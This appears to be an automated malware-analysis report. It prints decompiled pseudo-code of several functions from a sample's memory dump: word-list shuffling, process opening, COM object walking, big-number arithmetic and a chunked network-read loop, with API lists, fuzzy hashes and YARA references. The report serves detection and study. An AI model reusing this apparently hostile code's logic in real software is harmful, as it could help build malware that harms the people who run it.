                                			E052F2A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E052F6837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E052F50CA(_v16);
								goto L37;
							}
							_t103 = E052F6837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x52fa2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                0x052f2a2a
                                0x052f2a31
                                0x052f2a36
                                0x052f2a39
                                0x052f2a40
                                0x052f2a43
                                0x052f2a46
                                0x052f2a4d
                                0x052f2a50
                                0x052f2ba4
                                0x052f2ba6
                                0x052f2ba8
                                0x052f2bad
                                0x052f2bad
                                0x052f2a56
                                0x052f2a59
                                0x052f2a5c
                                0x052f2a5e
                                0x052f2a5e
                                0x052f2a62
                                0x00000000
                                0x00000000
                                0x052f2a66
                                0x052f2a92
                                0x052f2a97
                                0x052f2a99
                                0x052f2a99
                                0x052f2a9c
                                0x052f2a9f
                                0x052f2a9f
                                0x052f2aa1
                                0x00000000
                                0x052f2a6c
                                0x052f2a6e
                                0x052f2a8d
                                0x052f2a8d
                                0x052f2aa4
                                0x052f2aa4
                                0x052f2aa5
                                0x052f2aa5
                                0x052f2aa8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x052f2aa8
                                0x052f2a72
                                0x052f2ab9
                                0x052f2abd
                                0x052f2b97
                                0x052f2b99
                                0x052f2b99
                                0x052f2b9a
                                0x052f2b9d
                                0x00000000
                                0x052f2b9d
                                0x052f2ad7
                                0x052f2adb
                                0x052f2b93
                                0x00000000
                                0x052f2b93
                                0x052f2ae1
                                0x052f2ae4
                                0x052f2ae8
                                0x052f2aee
                                0x052f2af1
                                0x052f2b89
                                0x052f2b89
                                0x00000000
                                0x052f2b8f
                                0x052f2afc
                                0x052f2b05
                                0x052f2b19
                                0x052f2b20
                                0x052f2b35
                                0x052f2b3b
                                0x052f2b43
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x052f2b45
                                0x052f2b45
                                0x052f2b45
                                0x052f2b4c
                                0x052f2b54
                                0x00000000
                                0x00000000
                                0x052f2b56
                                0x052f2b5f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x052f2b61
                                0x052f2b63
                                0x052f2b66
                                0x052f2b66
                                0x052f2b69
                                0x052f2b6d
                                0x052f2b70
                                0x052f2b76
                                0x052f2b79
                                0x052f2b80
                                0x00000000
                                0x052f2afc
                                0x052f2a77
                                0x052f2a82
                                0x052f2a85
                                0x052f2a87
                                0x052f2a87
                                0x052f2a8a
                                0x052f2a8c
                                0x00000000
                                0x052f2a8c
                                0x052f2a66
                                0x052f2aac
                                0x052f2ab1
                                0x052f2ab3
                                0x052f2ab3
                                0x052f2ab6
                                0x052f2ab6
                                0x00000000

                                APIs
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • lstrcpy.KERNEL32(63699BC4,00000020), ref: 052F2B20
                                • lstrcat.KERNEL32(63699BC4,00000020), ref: 052F2B35
                                • lstrcmp.KERNEL32(00000000,63699BC4), ref: 052F2B4C
                                • lstrlen.KERNEL32(63699BC4), ref: 052F2B70
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 7ab6710287f809fe4ac99287e85646a51b8e8278afa0eaf40dbb1e6dc43f4035
                                • Instruction ID: 0e35061509d32aa94b30bdd66cf7b1b070452dd13718a2dcd72c9aabc41c0ad2
                                • Opcode Fuzzy Hash: 7ab6710287f809fe4ac99287e85646a51b8e8278afa0eaf40dbb1e6dc43f4035
                                • Instruction Fuzzy Hash: B051A035A14109EFDB21CF99E984BADFBB6FF46310F04806AEE19AB241C7709641CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F4C1B, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E052F4C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x52fa2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x52fa2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x52fa2b0 = _t6;
				 *0x52fa2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x52fa2ac = _t7;
				if(_t7 == 0) {
					 *0x52fa2ac =  *0x52fa2ac | 0xffffffff;
				}
				return 0;
			}








                                0x052f4c23
                                0x052f4c2b
                                0x052f4c30
                                0x00000000
                                0x052f4c7d
                                0x052f4c32
                                0x052f4c3a
                                0x052f4c7a
                                0x00000000
                                0x052f4c7a
                                0x052f4c3c
                                0x052f4c41
                                0x052f4c53
                                0x052f4c58
                                0x052f4c5e
                                0x052f4c66
                                0x052f4c6b
                                0x052f4c6d
                                0x052f4c6d
                                0x00000000

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,052F6B4E,?,?,00000001), ref: 052F4C23
                                • GetVersion.KERNEL32(?,00000001), ref: 052F4C32
                                • GetCurrentProcessId.KERNEL32(?,00000001), ref: 052F4C41
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 052F4C5E
                                • GetLastError.KERNEL32(?,00000001), ref: 052F4C7D
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 9be8762e6d070a2c124a27723b34967267bd95eca19ca140f07b762d3b108325
                                • Instruction ID: 70efed6992000604311a8cbdca1772c30c530897545158c017e55caaa2b7eb75
                                • Opcode Fuzzy Hash: 9be8762e6d070a2c124a27723b34967267bd95eca19ca140f07b762d3b108325
                                • Instruction Fuzzy Hash: CDF0F971775301AFEB109F64B80EF1A7E65AF047A4F005539F64AC51D0DBB24080CF15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F161A, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 052F165B
                                • SysFreeString.OLEAUT32(00000000), ref: 052F173E
                                  • Part of subcall function 052F6C6D: SysAllocString.OLEAUT32(052F92B0), ref: 052F6CBD
                                • SafeArrayDestroy.OLEAUT32(?), ref: 052F1792
                                • SysFreeString.OLEAUT32(?), ref: 052F17A0
                                  • Part of subcall function 052F1FC2: Sleep.KERNEL32(000001F4), ref: 052F200A
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: 2b59d7a8a31f112049bf24c4415c2f3d599c877038140a7abaac92171e83efec
                                • Instruction ID: 5fee0d53caa5c36ab14d01e79e2697d4595dfb41110af18c968f37c2c1daa9f1
                                • Opcode Fuzzy Hash: 2b59d7a8a31f112049bf24c4415c2f3d599c877038140a7abaac92171e83efec
                                • Instruction Fuzzy Hash: BA510375A10249EFCB00DFE8E8848AEF7B6FF88350B544479E60AD7250DB35AD55CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F6C6D, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E052F6C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x52fa2d4; // 0x215d5a8
					_t5 = _t102 + 0x52fb038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x52f92b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x52fa2d4; // 0x215d5a8
												_t28 = _t108 + 0x52fb0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x52fa2d4; // 0x215d5a8
														_t33 = _t78 + 0x52fb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                0x052f6c72
                                0x052f6c7b
                                0x052f6c7c
                                0x052f6c80
                                0x052f6c86
                                0x052f6c8c
                                0x052f6c95
                                0x052f6c9b
                                0x052f6ca5
                                0x052f6ca7
                                0x052f6cad
                                0x052f6cb2
                                0x052f6cbd
                                0x052f6cc5
                                0x052f6cc8
                                0x052f6deb
                                0x052f6cce
                                0x052f6cce
                                0x052f6cdb
                                0x052f6ce1
                                0x052f6ce7
                                0x052f6ceb
                                0x052f6cf1
                                0x052f6cfe
                                0x052f6d02
                                0x052f6d08
                                0x052f6d0b
                                0x052f6d11
                                0x052f6d17
                                0x052f6d1d
                                0x052f6d20
                                0x052f6d23
                                0x052f6d29
                                0x052f6d32
                                0x052f6d38
                                0x052f6d39
                                0x052f6d3c
                                0x052f6d3d
                                0x052f6d3e
                                0x052f6d46
                                0x052f6d47
                                0x052f6d48
                                0x052f6d4a
                                0x052f6d4e
                                0x052f6d52
                                0x00000000
                                0x00000000
                                0x052f6d58
                                0x052f6d61
                                0x052f6d67
                                0x052f6d71
                                0x052f6d75
                                0x052f6d77
                                0x052f6d84
                                0x052f6d88
                                0x052f6d90
                                0x052f6d95
                                0x052f6da7
                                0x052f6da9
                                0x052f6daf
                                0x052f6daf
                                0x052f6db8
                                0x052f6db8
                                0x052f6dba
                                0x052f6dc0
                                0x052f6dc0
                                0x052f6dc3
                                0x052f6dc9
                                0x052f6dcc
                                0x052f6dd5
                                0x00000000
                                0x00000000
                                0x00000000
                                0x052f6dd5
                                0x052f6d29
                                0x052f6d23
                                0x052f6d0b
                                0x052f6ddb
                                0x052f6ddb
                                0x052f6de1
                                0x052f6de1
                                0x052f6de7
                                0x052f6de7
                                0x052f6df0
                                0x052f6df6
                                0x052f6df6
                                0x052f6cb2
                                0x052f6dff

                                APIs
                                • SysAllocString.OLEAUT32(052F92B0), ref: 052F6CBD
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 052F6D9F
                                • SysFreeString.OLEAUT32(00000000), ref: 052F6DB8
                                • SysFreeString.OLEAUT32(?), ref: 052F6DE7
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 848799e389613eb0d2dbe51ca4d671f705454117647ed2f7c10f98a22f16d50d
                                • Instruction ID: 916fab55c872ba5b5ab3aeda42545e115ae6b104490a7bde5a15460dddbd5049
                                • Opcode Fuzzy Hash: 848799e389613eb0d2dbe51ca4d671f705454117647ed2f7c10f98a22f16d50d
                                • Instruction Fuzzy Hash: FD516075E0051AEFCB00DFA8D4889AEF7B5FF89304B1445A9E916EB214DB31AD41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F5D93, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                Download Yara Rule
                                C-Code - Quality: 85%
                                			E052F5D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E052F28F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E052F1000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E052F3915(_t101,  &_v428, _a8, _t96 - _t81);
					E052F3915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E052F1000(_t101, 0x52fa188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E052F1000(_a16, _a4);
						E052F3B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L052F7D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L052F7D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E052F679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E052F5AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E052F4A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x52fa188 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                0x052f5d96
                                0x052f5da2
                                0x052f5da8
                                0x052f5dad
                                0x052f5db1
                                0x052f5f23
                                0x052f5f27
                                0x052f5f27
                                0x052f5db7
                                0x052f5dbb
                                0x052f5dc1
                                0x052f5dc2
                                0x052f5dcd
                                0x052f5dd3
                                0x052f5dd8
                                0x052f5ddb
                                0x052f5df5
                                0x052f5e04
                                0x052f5e10
                                0x052f5e1a
                                0x052f5e1f
                                0x052f5e21
                                0x052f5e24
                                0x052f5edb
                                0x052f5ee1
                                0x052f5ef2
                                0x052f5f05
                                0x052f5f1b
                                0x00000000
                                0x052f5f20
                                0x052f5e2d
                                0x052f5e34
                                0x052f5e38
                                0x052f5e3e
                                0x052f5e40
                                0x052f5e42
                                0x052f5e44
                                0x052f5e46
                                0x052f5e50
                                0x052f5e55
                                0x052f5e57
                                0x052f5e59
                                0x052f5e5a
                                0x052f5e5b
                                0x052f5e5c
                                0x052f5e63
                                0x052f5e6a
                                0x052f5e6d
                                0x052f5e6d
                                0x052f5e3a
                                0x052f5e3a
                                0x052f5e3a
                                0x052f5e75
                                0x052f5e7d
                                0x052f5e89
                                0x052f5e8e
                                0x052f5e8e
                                0x052f5e93
                                0x00000000
                                0x00000000
                                0x052f5e95
                                0x052f5e98
                                0x052f5ea5
                                0x00000000
                                0x00000000
                                0x052f5ea7
                                0x052f5ea7
                                0x052f5eb4
                                0x052f5e8e
                                0x052f5e93
                                0x00000000
                                0x00000000
                                0x00000000
                                0x052f5e93
                                0x052f5ebe
                                0x052f5ec1
                                0x052f5ec4
                                0x052f5ecb
                                0x052f5ecb
                                0x052f5ed8
                                0x00000000
                                0x052f5ed8
                                0x052f5dc4
                                0x052f5dc8
                                0x052f5dc9
                                0x052f5dcb
                                0x00000000
                                0x00000000
                                0x00000000
                                0x052f5dcb
                                0x00000000

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 052F5E46
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 052F5E5C
                                • memset.NTDLL ref: 052F5F05
                                • memset.NTDLL ref: 052F5F1B
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 1ab6e85a11569902bb111167c99d391f44e4c98313cc42f9ebaaba6106c404a3
                                • Instruction ID: fd1c807927f7629774091cdede3f87394edb7b72a1345885846c6dc42227d215
                                • Opcode Fuzzy Hash: 1ab6e85a11569902bb111167c99d391f44e4c98313cc42f9ebaaba6106c404a3
                                • Instruction Fuzzy Hash: 2141B231B20219AFDB20DF68EC48FEEB775EF45710F104579BA19A7280DB70AE558B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F14A8, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E052F14A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x52fa144() != 0) {
								_v8 = 8;
							} else {
								_t47 = E052F6837(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x52fa2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E052F50CA(_v20);
											if(_v8 == 0) {
												_v8 = E052F37FC(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E052F25C7(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

























                                0x052f14a9
                                0x052f14af
                                0x052f14ba
                                0x052f14ba
                                0x052f14bc
                                0x052f5aff
                                0x052f5b02
                                0x052f5b0b
                                0x052f5b0e
                                0x052f5b11
                                0x052f5b19
                                0x052f5c17
                                0x052f5c22
                                0x052f5c25
                                0x052f5c27
                                0x00000000
                                0x052f5c27
                                0x052f5b1f
                                0x052f5b22
                                0x052f5c2a
                                0x052f5c2a
                                0x052f5b28
                                0x052f5b2b
                                0x052f5b2c
                                0x052f5b2e
                                0x052f5b37
                                0x052f5c0e
                                0x052f5b3d
                                0x052f5b43
                                0x052f5b4a
                                0x052f5b4d
                                0x052f5bfc
                                0x052f5b53
                                0x00000000
                                0x052f5b53
                                0x052f5b53
                                0x052f5b53
                                0x052f5b53
                                0x052f5b58
                                0x052f5b5a
                                0x052f5b5a
                                0x052f5b67
                                0x052f5b6f
                                0x00000000
                                0x00000000
                                0x052f5b71
                                0x052f5b7e
                                0x052f5b84
                                0x052f5b84
                                0x052f5b87
                                0x00000000
                                0x00000000
                                0x052f5b89
                                0x052f5b94
                                0x052f5ba8
                                0x052f5bde
                                0x052f5baa
                                0x052f5baa
                                0x052f5bb1
                                0x052f5bb9
                                0x00000000
                                0x052f5bbb
                                0x052f5bbb
                                0x052f5bc6
                                0x052f5bc9
                                0x052f5bd0
                                0x00000000
                                0x052f5bd0
                                0x052f5bc9
                                0x052f5bb9
                                0x052f5be1
                                0x052f5be4
                                0x052f5bec
                                0x052f5bf7
                                0x052f5bf7
                                0x00000000
                                0x052f5bec
                                0x052f5b91
                                0x00000000
                                0x052f5bd3
                                0x052f5bd3
                                0x00000000
                                0x052f5bdc
                                0x052f5c03
                                0x052f5c03
                                0x052f5c09
                                0x052f5c09
                                0x052f5b37
                                0x052f5b22
                                0x052f5c34
                                0x052f14b1
                                0x052f14b1
                                0x052f14b8
                                0x052f14c3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x052f14b8

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,052F7134,00000000,?), ref: 052F5B9B
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,052F7134,00000000,?,?), ref: 052F5BBB
                                  • Part of subcall function 052F25C7: wcstombs.NTDLL ref: 052F2687
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
